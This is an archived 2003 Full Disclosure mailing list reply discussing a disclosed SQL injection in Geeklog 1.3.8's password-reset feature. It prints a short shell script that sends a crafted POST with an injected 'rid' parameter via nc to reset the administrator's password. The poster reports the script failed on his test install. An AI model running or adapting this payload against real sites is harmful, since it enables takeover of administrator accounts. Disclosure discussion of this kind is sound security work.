Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Geeklog exploit

From: Thomas Rogg <thomas () outcast-media com>
Date: Sun, 19 Oct 2003 20:15:15 +0200
am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter jouko () iki fi:



...
The exploit uses the "forgot password" feature introduced in Geeklog
1.3.8. By constructing a certain kind of HTTP request, an attacker can
change any user's Geeklog password, including the administrator
password. This is because an SQL injection problem. In users.php we have
this kind of code (line about 750):
...


I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: